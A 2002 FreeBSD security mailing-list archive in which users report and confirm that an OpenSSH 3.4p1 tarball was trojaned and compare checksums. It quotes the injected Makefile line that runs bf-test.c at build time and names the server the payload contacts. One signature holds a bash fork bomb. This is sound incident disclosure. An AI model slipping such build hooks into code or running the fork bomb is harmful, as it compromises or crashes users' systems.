0917C6A711E; Thu, 1 Aug 2002 17:35:13 +1000 (EST) Date: Thu, 1 Aug 2002 17:35:12 +1000 From: Edwin Groothuis To: freebsd-security@freebsd.org Subject: openssh-3.4p1.tar.gz trojaned Message-ID: <20020801073512.GB78390@k7.mavetju> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Disposition: inline User-Agent: Mutt/1.4i Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org FYI (I'm not on -security) ----- Forwarded message from Edwin Groothuis ----- Date: Thu, 1 Aug 2002 16:55:51 +1000 From: Edwin Groothuis To: incidents@securityfocus.com Subject: openssh-3.4p1.tar.gz trojaned Greetings, Just want to inform you that the OpenSSH package op ftp.openbsd.org (and probably all its mirrors now) it trojaned: ftp://ftp.openbsd.org/pub/OpenBSD/OpenSSH/portable/openssh-3.4p1.tar.gz The OpenBSD people have been informed about it (via email to deraadt@openbsd.org and via irc.openprojects.org/#openbsd) The changed files are openssh-3.4p1/openbsd-compat/Makefile.in: all: libopenbsd-compat.a + @ $(CC) bf-test.c -o bf-test; ./bf-test>bf-test.out; sh ./bf-test.out & bf-test.c[1] is nothing more than a wrapper which generates a shell-script[2] which compiles itself and tries to connect to an server running on 203.62.158.32:6667 (web.snsonline.net). [1] http://www.mavetju.org/~edwin/bf-test.c [2] http://www.mavetju.org/~edwin/bf-output.sh This is the md5 checksum of the openssh-3.4p1.tar.gz in the FreeBSD ports system: MD5 (openssh-3.4p1.tar.gz) = 459c1d0262e939d6432f193c7a4ba8a8 This is the md5 checksum of the trojaned openssh-3.4p1.tar.gz: MD5 (openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57 Edwin -- Edwin Groothuis | Personal website: http://www.MavEtJu.org edwin@mavetju.org | Weblog: http://www.mavetju.org/weblog/weblog.php bash$ :(){ :|:&};: | Interested in MUDs? http://www.FatalDimensions.org/ To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 1 2:19:55 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 3D0A437B400 for ; Thu, 1 Aug 2002 02:19:54 -0700 (PDT) Received: from yoda.bph.ruhr-uni-bochum.de (yoda.bph.ruhr-uni-bochum.de [134.147.196.7]) by mx1.FreeBSD.org (Postfix) with ESMTP id DCA5943E5E for ; Thu, 1 Aug 2002 02:19:52 -0700 (PDT) (envelope-from cwe@bph.ruhr-uni-bochum.de) Received: from gonzo (gonzo [134.147.196.22]) by yoda.bph.ruhr-uni-bochum.de (8.8.8/8.8.8) with SMTP id LAA26725; Thu, 1 Aug 2002 11:19:51 +0200 From: Len Rose To: freebsd-security@freebsd.org Date: Thu, 01 Aug 2002 11:19:51 +0200 X-Priority: 3 (Normal) Message-Id: <85HBKG412V2XU74T2WJI1HENH0632.3d48fd37@gonzo> Subject: openssh trojan (alert) MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" X-Mailer: Opera 6.04 build 1135 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org FYI: http://lists.netsys.com/pipermail/full-disclosure/2002-August/000734.html To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 1 2:20:32 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 6905C37B400 for ; Thu, 1 Aug 2002 02:20:30 -0700 (PDT) Received: from yoda.bph.ruhr-uni-bochum.de (yoda.bph.ruhr-uni-bochum.de [134.147.196.7]) by mx1.FreeBSD.org (Postfix) with ESMTP id CC94043E72 for ; Thu, 1 Aug 2002 02:20:27 -0700 (PDT) (envelope-from cwe@bph.ruhr-uni-bochum.de) Received: from gonzo (gonzo [134.147.196.22]) by yoda.bph.ruhr-uni-bochum.de (8.8.8/8.8.8) with SMTP id LAA26793; Thu, 1 Aug 2002 11:20:22 +0200 From: Christoph Wegener To: freebsd-security@freebsd.org Date: Thu, 01 Aug 2002 11:20:21 +0200 X-Priority: 3 (Normal) Message-Id: Subject: Re: openssh trojan (alert) MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" X-Mailer: Opera 6.04 build 1135 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi everybody, I just checked it double: YES the openssh-3.4p1.tar.gz on ftp.openbsd.org is TROJANED!!! I downloaded our versions here just after there were released from the OpenSSH team, these ones seem to be clean. BUT: The version which is actually available on ftp.openbsd.org is NOT clean! Or did I make a mistake in my analysis?!? So is this the time to say good bye to OpenSSH?!? ;)) Christoph -- .-. Ruhr-Universitaet Bochum /v\ L I N U X Lehrstuhl fuer Biophysik // \\ >Penguin Computing< c/o Christoph Wegener /( )\ Gebaeude ND 04/Nord ^^-^^ D-44780 Bochum, GERMANY Tel: +49 (234) 32-25754 Fax: +49 (234) 32-14626 mailto:cwe@bph.ruhr-uni-bochum.de http://www.bph.ruhr-uni-bochum.de To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 1 2:20:51 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 8C19037B400 for ; Thu, 1 Aug 2002 02:20:47 -0700 (PDT) Received: from yoda.bph.ruhr-uni-bochum.de (yoda.bph.ruhr-uni-bochum.de [134.147.196.7]) by mx1.FreeBSD.org (Postfix) with ESMTP id A5BEB43E72 for ; Thu, 1 Aug 2002 02:20:43 -0700 (PDT) (envelope-from cwe@bph.ruhr-uni-bochum.de) Received: from gonzo (gonzo [134.147.196.22]) by yoda.bph.ruhr-uni-bochum.de (8.8.8/8.8.8) with SMTP id LAA26860; Thu, 1 Aug 2002 11:20:43 +0200 From: Christoph Wegener To: freebsd-security@freebsd.org Date: Thu, 01 Aug 2002 11:20:42 +0200 X-Priority: 3 (Normal) Message-Id: Subject: Re: [suse-security] openssh trojan (alert) MIME-Version: 1.0 Content-Type: text/plain; charset="us-ascii" X-Mailer: Opera 6.04 build 1135 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi again, to be a little more concrete: about 10 minutes ago I downloaded the tarball of openssh-3.4p1 which is actually available on ftp.openbsd.org. I untared it, cd'd to openbsd-compat and did a gcc bf-test.c -o bf-test. After this I did sh bftest > bftest.sh and finally got a shell script which contains the same as reported on the link below. So there is definitively a connection attempt to this server - but actually I do not know waht it is good for. Could there be some legal reaseon for this?!? Christoph BTW: were are just trying to double-check the sig of the tarball but due to probs with the keyservers didn't have results for now... -- .-. Ruhr-Universitaet Bochum /v\ L I N U X Lehrstuhl fuer Biophysik // \\ >Penguin Computing< c/o Christoph Wegener /( )\ Gebaeude ND 04/Nord ^^-^^ D-44780 Bochum, GERMANY Tel: +49 (234) 32-25754 Fax: +49 (234) 32-14626 mailto:cwe@bph.ruhr-uni-bochum.de http://www.bph.ruhr-uni-bochum.de To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 1 2:27:52 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id C9D0337B400 for ; Thu, 1 Aug 2002 02:27:49 -0700 (PDT) Received: from pd4mo2so.prod.shaw.ca (h24-71-223-10.cg.shawcable.net [24.71.223.10]) by mx1.FreeBSD.org (Postfix) with ESMTP id 2881643E5E for ; Thu, 1 Aug 2002 02:27:49 -0700 (PDT) (envelope-from colin.percival@wadham.ox.ac.uk) Received: from pd5mr4so.prod.shaw.ca (pd5mr4so-qfe3.prod.shaw.ca [10.0.141.168]) by l-daemon (iPlanet Messaging Server 5.1 HotFix 0.8 (built May 12 2002)) with ESMTP id <0H0500GE6RMC45@l-daemon> for freebsd-security@freebsd.org; Thu, 01 Aug 2002 03:27:48 -0600 (MDT) Received: from pn2ml3so.prod.shaw.ca (pn2ml3so-qfe0.prod.shaw.ca [10.0.121.147]) by l-daemon (iPlanet Messaging Server 5.1 HotFix 0.8 (built May 12 2002)) with ESMTP id <0H0500JLBRMCIG@l-daemon> for freebsd-security@freebsd.org; Thu, 01 Aug 2002 03:27:48 -0600 (MDT) Received: from piii600.wadham.ox.ac.uk (h24-79-84-133.vc.shawcable.net [24.79.84.133]) by l-daemon (iPlanet Messaging Server 5.1 HotFix 0.6 (built Apr 26 2002)) with ESMTP id <0H050011VRMC90@l-daemon> for freebsd-security@FreeBSD.ORG; Thu, 01 Aug 2002 03:27:48 -0600 (MDT) Date: Thu, 01 Aug 2002 02:27:45 -0700 From: Colin Percival Subject: Re: openssh-3.4p1.tar.gz trojaned In-reply-to: <20020801073512.GB78390@k7.mavetju> X-Sender: cperciva@popserver.sfu.ca To: freebsd-security@freebsd.org Message-id: <5.0.2.1.1.20020801022610.01e93940@popserver.sfu.ca> MIME-version: 1.0 X-Mailer: QUALCOMM Windows Eudora Version 5.0.2 Content-type: text/plain; charset=us-ascii; format=flowed Content-transfer-encoding: 7BIT X-Info-RBL1: ox.ac.uk filters email against various lists. X-Info-RBL2: If your replies bounce, try sending them to cperciva@sfu.ca Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org At 17:35 01/08/2002 +1000, Edwin Groothuis wrote: >edwin@mavetju.org | Weblog: http://www.mavetju.org/weblog/weblog.php ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ Interesting details here, FYI. Colin Percival To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 1 2:48:50 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id CCAE637B405 for ; Thu, 1 Aug 2002 02:48:46 -0700 (PDT) Received: from doos.cluecentral.net (cluecentral.net [193.109.122.221]) by mx1.FreeBSD.org (Postfix) with SMTP id 933C443E4A for ; Thu, 1 Aug 2002 02:48:45 -0700 (PDT) (envelope-from sabri@cluecentral.net) Received: (qmail 45727 invoked by uid 1000); 1 Aug 2002 09:48:23 -0000 Received: from localhost (sendmail-bs@127.0.0.1) by localhost with SMTP; 1 Aug 2002 09:48:23 -0000 Date: Thu, 1 Aug 2002 11:48:23 +0200 (CEST) From: Sabri Berisha To: Colin Percival Cc: Subject: Re: openssh-3.4p1.tar.gz trojaned In-Reply-To: <5.0.2.1.1.20020801022610.01e93940@popserver.sfu.ca> Message-ID: <20020801114540.H44465-100000@doos.cluecentral.net> X-NCC-Regid: nl.bit X-No-Archive: yes Approved: sabri@pfy.nl MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Thu, 1 Aug 2002, Colin Percival wrote: Hi all, > At 17:35 01/08/2002 +1000, Edwin Groothuis wrote: > >edwin@mavetju.org | Weblog: http://www.mavetju.org/weblog/weblog.php > ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^ > Interesting details here, FYI. I have a 'clean' version mirror at http://www.cluecentral.net/openssh-3.4p1.tar.gz The md5 sum is 459c1d0262e939d6432f193c7a4ba8a8. -- Sabri Berisha - www.megabit.nl - "I route, therefore you are" - nooit meer naar Bonaire: http://nu.nl/document?n=59946 - 'that particular feeding of Martijn Bevelander, notorious spammer and whiney repeat-posting troll, was almost a work of art.' (nanae) To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 1 3: 0:58 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 27FA437B400 for ; Thu, 1 Aug 2002 03:00:53 -0700 (PDT) Received: from nippur.irb.hr (nippur.irb.hr [161.53.128.127]) by mx1.FreeBSD.org (Postfix) with ESMTP id DF3AE43E72 for ; Thu, 1 Aug 2002 03:00:51 -0700 (PDT) (envelope-from mario.pranjic@irb.hr) Received: from localhost (keeper@localhost) by nippur.irb.hr (8.9.3/8.9.3) with ESMTP id MAA26372; Thu, 1 Aug 2002 12:00:46 +0200 (MET DST) Date: Thu, 1 Aug 2002 12:00:46 +0200 (MET DST) From: Mario Pranjic To: Edwin Groothuis Cc: Subject: Re: openssh-3.4p1.tar.gz trojaned In-Reply-To: <20020801073512.GB78390@k7.mavetju> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Thu, 1 Aug 2002, Edwin Groothuis wrote: > This is the md5 checksum of the openssh-3.4p1.tar.gz in the FreeBSD > ports system: > MD5 (openssh-3.4p1.tar.gz) = 459c1d0262e939d6432f193c7a4ba8a8 > > This is the md5 checksum of the trojaned openssh-3.4p1.tar.gz: > MD5 (openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57 My md5 checksum (from the current ports tree): MD5 (openssh-3.4.tgz) = 39659226ff5b0d16d0290b21f67c46f2 No need to worry? Or? Mario Pranjic, dipl.ing. sistem administrator Knjiznica, Institut Rudjer Boskovic ------------------------------------- e-mail: mario.pranjic@irb.hr ICQ: 72059629 tel: +385 1 45 60 954 (interni: 1293) ------------------------------------- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 1 3: 2:55 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id AAC4337B400 for ; Thu, 1 Aug 2002 03:02:53 -0700 (PDT) Received: from web14407.mail.yahoo.com (web14407.mail.yahoo.com [216.136.174.77]) by mx1.FreeBSD.org (Postfix) with SMTP id 7D1EB43E6A for ; Thu, 1 Aug 2002 03:02:53 -0700 (PDT) (envelope-from sonamsinghl@yahoo.com) Message-ID: <20020801100253.49251.qmail@web14407.mail.yahoo.com> Received: from [202.88.149.172] by web14407.mail.yahoo.com via HTTP; Thu, 01 Aug 2002 03:02:53 PDT Date: Thu, 1 Aug 2002 03:02:53 -0700 (PDT) From: sonam singh Subject: testing please donot reply To: freebsd-security@freebsd.org MIME-Version: 1.0 Content-Type: text/plain; charset=us-ascii Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org testing please donot reply __________________________________________________ Do You Yahoo!? Yahoo! Health - Feel better, live better http://health.yahoo.com To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 1 3:11:26 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 4EE0337B400 for ; Thu, 1 Aug 2002 03:11:22 -0700 (PDT) Received: from goofy.epylon.com (ip216-203-220-162.z220-203-216.customer.algx.net [216.203.220.162]) by mx1.FreeBSD.org (Postfix) with ESMTP id 2C38843E6E for ; Thu, 1 Aug 2002 03:11:18 -0700 (PDT) (envelope-from jdicioccio@epylon.com) Received: by goofy.epylon.lan with Internet Mail Service (5.5.2653.19) id ; Thu, 1 Aug 2002 03:11:17 -0700 Message-ID: <657B20E93E93D4118F9700D0B73CE3EA02FFF643@goofy.epylon.lan> From: "DiCioccio, Jason" To: 'Mario Pranjic ' , 'Edwin Groothuis ' Cc: "'freebsd-security@FreeBSD.ORG '" Subject: RE: openssh-3.4p1.tar.gz trojaned Date: Thu, 1 Aug 2002 03:11:17 -0700 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.5.2653.19) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: Content-Type: text/plain; charset="iso-8859-1" Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org You're looking at /usr/ports/security/openssh. I believe this refers to openssh-portable (hence the p1, etc.) -----Original Message----- From: Mario Pranjic To: Edwin Groothuis Cc: freebsd-security@FreeBSD.ORG Sent: 8/1/02 3:00 AM Subject: Re: openssh-3.4p1.tar.gz trojaned On Thu, 1 Aug 2002, Edwin Groothuis wrote: > This is the md5 checksum of the openssh-3.4p1.tar.gz in the FreeBSD > ports system: > MD5 (openssh-3.4p1.tar.gz) = 459c1d0262e939d6432f193c7a4ba8a8 > > This is the md5 checksum of the trojaned openssh-3.4p1.tar.gz: > MD5 (openssh-3.4p1.tar.gz) = 3ac9bc346d736b4a51d676faa2a08a57 My md5 checksum (from the current ports tree): MD5 (openssh-3.4.tgz) = 39659226ff5b0d16d0290b21f67c46f2 No need to worry? Or? Mario Pranjic, dipl.ing. sistem administrator Knjiznica, Institut Rudjer Boskovic ------------------------------------- e-mail: mario.pranjic@irb.hr ICQ: 72059629 tel: +385 1 45 60 954 (interni: 1293) ------------------------------------- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 1 3:11:59 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 3DC8D37B400 for ; Thu, 1 Aug 2002 03:11:56 -0700 (PDT) Received: from earth.hal.rcast.u-tokyo.ac.jp (earth.hal.rcast.u-tokyo.ac.jp [157.82.80.2]) by mx1.FreeBSD.org (Postfix) with ESMTP id 2679F43E3B for ; Thu, 1 Aug 2002 03:11:55 -0700 (PDT) (envelope-from konno@hal.rcast.u-tokyo.ac.jp) Received: from [192.168.80.236] (sun [157.82.80.16]) by earth.hal.rcast.u-tokyo.ac.jp (8.9.3/3.7W) with ESMTP id TAA06799; Thu, 1 Aug 2002 19:11:53 +0900 (JST) Date: Thu, 01 Aug 2002 19:11:53 +0900 From: Shunichi Konno To: Subject: Re: openssh-3.4p1.tar.gz trojaned In-Reply-To: References: <20020801073512.GB78390@k7.mavetju> Message-Id: <20020801190819.98E5.KONNO@hal.rcast.u-tokyo.ac.jp> MIME-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" Content-Transfer-Encoding: 7bit X-Mailer: Becky! ver. 2.05.03 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hello, On Thu, 1 Aug 2002 12:00:46 +0200 (MET DST) Mario Pranjic wrote: MP> My md5 checksum (from the current ports tree): MP> MD5 (openssh-3.4.tgz) = 39659226ff5b0d16d0290b21f67c46f2 If you don't use /usr/ports/security/openssh-portable but use /usr/ports/security/openssh, it's okay, I think. I have same openssh-3.4.tgz which md5 checksum is 39659226ff5b0d16d0290b21f67c46f2, and there is no files such like trojaned openssh-3.4p1.tgz have. ---------- KONNO Shunichi To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 1 3:15:34 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 64E1937B401 for ; Thu, 1 Aug 2002 03:15:31 -0700 (PDT) Received: from nippur.irb.hr (nippur.irb.hr [161.53.128.127]) by mx1.FreeBSD.org (Postfix) with ESMTP id 53D6943E6A for ; Thu, 1 Aug 2002 03:15:30 -0700 (PDT) (envelope-from mario.pranjic@irb.hr) Received: from localhost (keeper@localhost) by nippur.irb.hr (8.9.3/8.9.3) with ESMTP id MAA26435; Thu, 1 Aug 2002 12:15:22 +0200 (MET DST) Date: Thu, 1 Aug 2002 12:15:22 +0200 (MET DST) From: Mario Pranjic To: Shunichi Konno Cc: Subject: Re: openssh-3.4p1.tar.gz trojaned In-Reply-To: <20020801190819.98E5.KONNO@hal.rcast.u-tokyo.ac.jp> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Thu, 1 Aug 2002, Shunichi Konno wrote: > Date: Thu, 01 Aug 2002 19:11:53 +0900 > From: Shunichi Konno > To: freebsd-security@FreeBSD.ORG > Subject: Re: openssh-3.4p1.tar.gz trojaned > > I have same openssh-3.4.tgz which md5 checksum is > 39659226ff5b0d16d0290b21f67c46f2, and there is no files > such like trojaned openssh-3.4p1.tgz have. So I checked it too. :) No bf-test.c in source. Mario Pranjic, dipl.ing. sistem administrator Knjiznica, Institut Rudjer Boskovic ------------------------------------- e-mail: mario.pranjic@irb.hr ICQ: 72059629 tel: +385 1 45 60 954 (interni: 1293) ------------------------------------- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 1 3:33:34 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 0A9F337B400 for ; Thu, 1 Aug 2002 03:33:32 -0700 (PDT) Received: from ptserver.progtech.net (pD9590BDA.dip.t-dialin.net [217.89.11.218]) by mx1.FreeBSD.org (Postfix) with ESMTP id 53CEB43E6A for ; Thu, 1 Aug 2002 03:33:30 -0700 (PDT) (envelope-from rg@progtech.net) Received: from PROGTECH.net (isis.muc.progtech.intern [10.25.0.100]) by ptserver.progtech.net (8.12.3/8.12.3) with ESMTP id g71AXQuF070020 for ; Thu, 1 Aug 2002 12:33:27 +0200 (CEST) (envelope-from rg@PROGTECH.net) Message-ID: <3D490E77.6050003@PROGTECH.net> Date: Thu, 01 Aug 2002 12:33:27 +0200 From: Rolf Grossmann User-Agent: Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.1b) Gecko/20020729 X-Accept-Language: en,German [de] MIME-Version: 1.0 To: freebsd-security@FreeBSD.ORG Subject: Re: FreeBSD Security Advisory FreeBSD-SA-02:34.rpc References: <200208010246.g712k6NM003336@freefall.freebsd.org> Content-Type: text/plain; charset=us-ascii; format=flowed Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi, I've been looking at your patch for the rpc buffer overflow and I believe it's not sufficient. You're using: if ((c > maxsize && UINT_MAX/elsize < c) && (xdrs->x_op != XDR_FREE)) { return (FALSE); but I think it really should test both conditions (the braces suggest that you actually meant that anyway): if ((c > maxsize || UINT_MAX/elsize < c) && (xdrs->x_op != XDR_FREE)) { return (FALSE); Otherwise, if the writer of the application using xdr_array specified maxsize too large (maybe he didn't care), you're in trouble again. I think it's clearer if you write the condition the other way round: if ((c > maxsize || c > UINT_MAX/elsize) && (xdrs->x_op != XDR_FREE)) { return (FALSE); Should I file a PR or am I completely off track here? Bye, Rolf To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 1 3:56: 1 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 8F55637B400 for ; Thu, 1 Aug 2002 03:55:58 -0700 (PDT) Received: from yoda.bph.ruhr-uni-bochum.de (yoda.bph.ruhr-uni-bochum.de [134.147.196.7]) by mx1.FreeBSD.org (Postfix) with ESMTP id 2DE7C43E65 for ; Thu, 1 Aug 2002 03:55:57 -0700 (PDT) (envelope-from cwe@bph.ruhr-uni-bochum.de) Received: from gonzo (gonzo [134.147.196.22]) by yoda.bph.ruhr-uni-bochum.de (8.8.8/8.8.8) with SMTP id MAA31880; Thu, 1 Aug 2002 12:55:47 +0200 From: Christoph Wegener To: Shunichi Konno , Mario Pranjic Cc: freebsd-security@FreeBSD.ORG Date: Thu, 01 Aug 2002 12:55:46 +0200 X-Priority: 3 (Normal) Organization: Lehrstuhl fuer Biophysik - Ruhr-Universitaet Bochum In-Reply-To: Message-Id: Subject: Re: openssh-3.4p1.tar.gz trojaned MIME-Version: 1.0 Content-Type: text/plain; charset="US-ASCII" X-Mailer: Opera 6.04 build 1135 Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org Hi, but be careful: you have to check it with the original tgz-file, cause the shellscript removes its existence itself from the archive once you have installed. So taking your tree and making a tgz is NO solution to test... Greetz Christoph 1.8.2002 12:15:22, Mario Pranjic wrote: >On Thu, 1 Aug 2002, Shunichi Konno wrote: > >> Date: Thu, 01 Aug 2002 19:11:53 +0900 >> From: Shunichi Konno >> To: freebsd-security@FreeBSD.ORG >> Subject: Re: openssh-3.4p1.tar.gz trojaned >> >> I have same openssh-3.4.tgz which md5 checksum is >> 39659226ff5b0d16d0290b21f67c46f2, and there is no files >> such like trojaned openssh-3.4p1.tgz have. > >So I checked it too. :) No bf-test.c in source. -- .-. Ruhr-Universitaet Bochum /v\ L I N U X Lehrstuhl fuer Biophysik // \\ >Penguin Computing< c/o Christoph Wegener /( )\ Gebaeude ND 04/Nord ^^-^^ D-44780 Bochum, GERMANY Tel: +49 (234) 32-25754 Fax: +49 (234) 32-14626 mailto:cwe@bph.ruhr-uni-bochum.de http://www.bph.ruhr-uni-bochum.de To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 1 4:11:48 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id AF30137B400 for ; Thu, 1 Aug 2002 04:11:43 -0700 (PDT) Received: from nippur.irb.hr (nippur.irb.hr [161.53.128.127]) by mx1.FreeBSD.org (Postfix) with ESMTP id 7C00E43E5E for ; Thu, 1 Aug 2002 04:11:42 -0700 (PDT) (envelope-from mario.pranjic@irb.hr) Received: from localhost (keeper@localhost) by nippur.irb.hr (8.9.3/8.9.3) with ESMTP id NAA26546; Thu, 1 Aug 2002 13:07:51 +0200 (MET DST) Date: Thu, 1 Aug 2002 13:07:51 +0200 (MET DST) From: Mario Pranjic To: Christoph Wegener Cc: Shunichi Konno , Mario Pranjic , Subject: Re: openssh-3.4p1.tar.gz trojaned In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk List-ID: List-Archive: (Web Archive) List-Help: (List Instructions) List-Subscribe: List-Unsubscribe: X-Loop: FreeBSD.org On Thu, 1 Aug 2002, Christoph Wegener wrote: > Date: Thu, 01 Aug 2002 12:55:46 +0200 > From: Christoph Wegener > To: Shunichi Konno , > Mario Pranjic > Cc: freebsd-security@FreeBSD.ORG > Subject: Re: openssh-3.4p1.tar.gz trojaned > > Hi, > but be careful: you have to check it with the original tgz-file, cause the shellscript removes its existence itself from the archive once you > have installed. So taking your tree and making a tgz is NO solution to test... tar tzf openssh-3.4.tgz | less In my distfiles, I find no sign of bf-test.c. When i did: make fetch; make checksum in openssh ports dir I got the checksum mismatch and I found the bf-test.c: ssh/ssh-keygen/bf-test.c My old md5 (from which openssh ports is compiled: MD5 (openssh-3.4.tgz) = 39659226ff5b0d16d0290b21f67c46f2 New (just downloaded) openssh source: MD5 (openssh-3.4.tgz) = bda7c80825d9d9f35f17046ed90e1b0a This one DOES contain bf-test.c file. Any ideas what is going on? Mario Pranjic, dipl.ing. sistem administrator Knjiznica, Institut Rudjer Boskovic ------------------------------------- e-mail: mario.pranjic@irb.hr ICQ: 72059629 tel: +385 1 45 60 954 (interni: 1293) ------------------------------------- To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe freebsd-security" in the body of the message From owner-freebsd-security Thu Aug 1 4:19:57 2002 Delivered-To: freebsd-security@freebsd.org Received: from mx1.FreeBSD.org (mx1.FreeBSD.org [216.136.204.125]) by hub.freebsd.org (Postfix) with ESMTP id 070EE37B400 for ; Thu, 1 Aug 2002 